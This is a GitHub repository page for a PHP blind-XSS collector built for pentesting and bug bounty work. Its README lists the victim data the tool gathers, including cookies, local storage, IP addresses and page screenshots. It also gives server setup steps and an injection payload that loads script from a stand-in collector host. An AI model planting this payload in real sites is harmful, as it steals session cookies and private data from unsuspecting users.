Skip to content

gwen001/bxss

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

25 Commits
.github
.github
 
 
images
images
 
 
.htaccess
.htaccess
 
 
LICENSE.md
LICENSE.md
 
 
README.md
README.md
 
 
VERSION.md
VERSION.md
 
 
index.php
index.php
 
 
preview.png
preview.png
 
 

Repository files navigation

bxss

My alternative to XSS Hunter for blind XSS.

php badge MIT license badge twitter badge

Features

  • reports stored in sqlite database
  • call logged in log file
  • reports send on Slack channel (beta)
  • data collected:
    • vulnerable URL
    • referer URL
    • victim IP
    • victim User-Agent
    • victim cookies
    • victim locale storage
    • HTML of the vulnerable page
    • screenshot of the vulnerable page

Todo:

  • reports send by mail

Install

git clone https://github.com/gwen001/bxss

The web user should have write access on the directory images.

Configure domain

Using Apache, you can easily configure a vhost like this:

<IfModule mod_ssl.c>
<VirtualHost *:443>
	ServerName x.example.com
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html/bxss/
	SSLCertificateFile /etc/letsencrypt/live/x.example.com/fullchain.pem
	SSLCertificateKeyFile /etc/letsencrypt/live/x.example.com/privkey.pem
</VirtualHost>
</IfModule>

<VirtualHost *:80>
	ServerName x.example.com
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html/bxss/
</VirtualHost>

Injection

As soon as the script is available online, you can use your favorite XSS payload:

<script src=http://x.example.com></script>

Feel free to open an issue if you have any problem with the script.

About

Alternative to XSS Hunter for blind XSS.

Topics

php xss pentesting bugbounty security-tools xsshunter

Resources

Readme

License

MIT license
Activity

Stars

48 stars

Watchers

2 watching

Forks

10 forks
Report repository

Releases 1

v1.0.0 Latest
Dec 2, 2022

Sponsor this project

 
Learn more about GitHub Sponsors

Languages